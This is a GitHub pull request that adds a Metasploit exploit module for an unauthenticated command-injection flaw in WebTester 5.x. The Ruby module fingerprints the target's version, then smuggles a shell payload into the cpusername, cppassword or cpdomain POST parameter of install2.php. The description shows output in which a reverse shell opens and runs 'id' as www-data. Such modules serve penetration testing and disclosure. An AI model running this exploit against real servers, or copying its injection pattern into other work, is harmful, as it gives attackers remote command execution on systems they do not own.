### PR TITLE
Add WebTester 5.x Command Execution exploit module

### DIFF
--- a/modules/exploits/unix/webapp/webtester_exec.rb
+++ b/modules/exploits/unix/webapp/webtester_exec.rb
@@ -1,0 +1,103 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "WebTester 5.x Command Execution",
+      'Description'    => %q{
+          This module exploits a command execution vulnerability in WebTester
+        version 5.x. The 'install2.php' file allows unauthenticated users to
+        execute arbitrary commands in the 'cpusername', 'cppassword' and
+        'cpdomain' parameters.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Brendan Coles <bcoles[at]gmail.com>'  # Metasploit
+        ],
+      'References'     =>
+        [
+          ['URL'       => 'https://sourceforge.net/p/webtesteronline/bugs/3/']
+        ],
+      'Payload'        =>
+        {
+          'BadChars'   => "\x00"
+        },
+      'Arch'           => ARCH_CMD,
+      'Platform'       => 'unix',
+      'Targets'        =>
+        [
+          # Tested on WebTester v5.1.20101016
+          [ 'WebTester version 5.x', { 'auto' => true } ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Oct 17 2013',
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          OptString.new('TARGETURI', [true, 'The base path to WebTester', '/webtester5/'])
+        ], self.class)
+  end
+
+  #
+  # Checks if target is running WebTester version 5.x
+  #
+  def check
+    res = send_request_raw({ 'uri' => normalize_uri(target_uri.path) })
+
+    if not res
+      print_error("#{peer} - Connection timed out")
+      return Exploit::CheckCode::Unknown
+    end
+
+    if res.body =~ /Eppler Software/
+      if res.body =~ / - v(5\.[\d\.]+)/
+        print_status("#{peer} - Found version: #{$1}")
+        return Exploit::CheckCode::Vulnerable
+      else
+        return Exploit::CheckCode::Detected
+      end
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    vuln_params = [
+      'cpusername',
+      'cppassword',
+      'cpdomain'
+    ]
+    print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)...")
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, 'install2.php'),
+      'vars_post'  => {
+        'createdb' => 'yes',
+        'cpanel'   => 'yes',
+        "#{vuln_params.sample}" => "';#{payload.encoded} #"
+      }
+    })
+
+    if not res
+      fail_with(Failure::Unknown, "#{peer} - Request timed out")
+    elsif res.code == 200 and res.body =~ /Failed to connect to database server/
+      print_good("#{peer} - Payload sent successfully")
+    else
+      fail_with(Failure::Unknown, "#{peer} - Something went wrong")
+    end
+
+  end
+end


### PR DESCRIPTION
Add WebTester 5.x Command Execution exploit module.

Homepage: http://sourceforge.net/projects/webtesteronline/
Tested on: WebTester v5.1.20101016

![WebTester 5.x Command Execution exploit module](https://f.cloud.github.com/assets/434827/1349894/031f141e-36fe-11e3-821c-3a37bb3af2cd.png)
### Check

```
msf exploit(webtester_exec) > check

[*] 192.168.124.180:80 - Found version: 5.1.20101016
[+] The target is vulnerable.
```
### Run

```
msf exploit(webtester_exec) > run
[*] Started reverse double handler

[*] 192.168.124.180:80 - Sending payload (539 bytes)...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[+] 192.168.124.180:80 - Payload sent successfully
[*] Command: echo 9gnSokBtJDgOQ1hA;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "9gnSokBtJDgOQ1hA\r\n"
[*] Matching...
[*] A is input...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command shell session 1 opened (192.168.124.180:4444 -> 192.168.124.180:33093) at 2013-10-17 03:20:00 -0400
[*] Command: echo fCm8SMWnLUpfSz5C;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
^C
```
